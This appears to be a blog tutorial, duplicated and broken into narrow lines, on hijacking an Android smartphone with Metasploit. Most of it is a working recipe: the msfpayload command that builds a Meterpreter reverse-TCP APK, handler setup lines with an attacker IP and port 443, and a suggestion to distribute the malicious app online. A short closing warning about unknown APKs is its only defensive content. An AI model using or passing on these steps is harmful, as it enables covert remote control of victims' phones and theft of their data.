Here is some initial
information for this
tutorial:
Attacker IP address:
192.168.8.94
Attacker port to receive
connection: 443
Requirements:
1. Metasploit
framework (we use Kali
Linux 1.0.6 in this
tutorial)
2. Android smartphone
(we use HTC One
android 4.4 KitKat)
Step by Step Hacking
Android Smartphone
Tutorial using
Metasploit:
1. Open terminal (CTRL +
ALT + T) view tutorial
how to create linux
keyboard shortcut
.
2. We will utilize
Metasploit payload
framework to create
exploit for this tutorial.
msfpayload
android/
meterpreter/
reverse_tcp
LHOST=<attacker_
ip_address>
LPORT=<port_to_
receive_
connection>
As described above
that attacker IP
address is 192.168.8.94,
below is our screenshot
when executed the
command
3. Because our payload
is reverse_tcp where
attacker expect the
victim to connect back
to attacker machine,
attacker needs to set
up the handler to handle
incoming connections to
the port already
specified above. Type
msfconsole to go to
Metasploit console.
Info:
use exploit/multi/
handler –> we will
use Metasploit
handler
set payload
android/
meterpreter/
reverse_tcp –>
make sure the
payload is the
same with step 2
4. The next step we
need to configure the
switch for the
Metasploit payload we
already specified in step
3.
Info:
set lhost
192.168.8.94 –>
attacker IP
address
set lport 443 –>
port to listen the
reverse connection
exploit –> start to
listen incoming
connection
5. Attacker already
have the APK's file and
now he will start
distribute it (I don't
need to describe how to
distribute this file,
internet is the good
place for distribution ).
6. Short stories the
victim (me myself)
download the malicious
APK's file and install it.
After victim open the
application, attacker
Metasploit console get
something like this:
7. It's mean that
attacker already inside
the victim android
smartphone and he can
do everything with
victim phone.
See the video below if
you are not clear about
the step by step
Hacking Android
Smartphone Tutorial
using Metasploit above:
Conclusion:
1. Don't install APK's
from the unknown
source.
2. If you really want to
install APK's from
unknown source, make
sure you can view, read
and examine the source
code. The picture below
is the source code of
our malicious APK's in
this tutorial.
Share this post if you
found it useful
Share this article if
you found this post
was usefu
information for this
tutorial:
Attacker IP address:
192.168.8.94
Attacker port to receive
connection: 443
Requirements:
1. Metasploit
framework (we use Kali
Linux 1.0.6 in this
tutorial)
2. Android smartphone
(we use HTC One
android 4.4 KitKat)
Step by Step Hacking
Android Smartphone
Tutorial using
Metasploit:
1. Open terminal (CTRL +
ALT + T) view tutorial
how to create linux
keyboard shortcut
.
2. We will utilize
Metasploit payload
framework to create
exploit for this tutorial.
msfpayload
android/
meterpreter/
reverse_tcp
LHOST=<attacker_
ip_address>
LPORT=<port_to_
receive_
connection>
As described above
that attacker IP
address is 192.168.8.94,
below is our screenshot
when executed the
command
3. Because our payload
is reverse_tcp where
attacker expect the
victim to connect back
to attacker machine,
attacker needs to set
up the handler to handle
incoming connections to
the port already
specified above. Type
msfconsole to go to
Metasploit console.
Info:
use exploit/multi/
handler –> we will
use Metasploit
handler
set payload
android/
meterpreter/
reverse_tcp –>
make sure the
payload is the
same with step 2
4. The next step we
need to configure the
switch for the
Metasploit payload we
already specified in step
3.
Info:
set lhost
192.168.8.94 –>
attacker IP
address
set lport 443 –>
port to listen the
reverse connection
exploit –> start to
listen incoming
connection
5. Attacker already
have the APK's file and
now he will start
distribute it (I don't
need to describe how to
distribute this file,
internet is the good
place for distribution ).
6. Short stories the
victim (me myself)
download the malicious
APK's file and install it.
After victim open the
application, attacker
Metasploit console get
something like this:
7. It's mean that
attacker already inside
the victim android
smartphone and he can
do everything with
victim phone.
See the video below if
you are not clear about
the step by step
Hacking Android
Smartphone Tutorial
using Metasploit above:
Conclusion:
1. Don't install APK's
from the unknown
source.
2. If you really want to
install APK's from
unknown source, make
sure you can view, read
and examine the source
code. The picture below
is the source code of
our malicious APK's in
this tutorial.
Share this post if you
found it useful
Share this article if
you found this post
was usefu
0 comments:
Post a Comment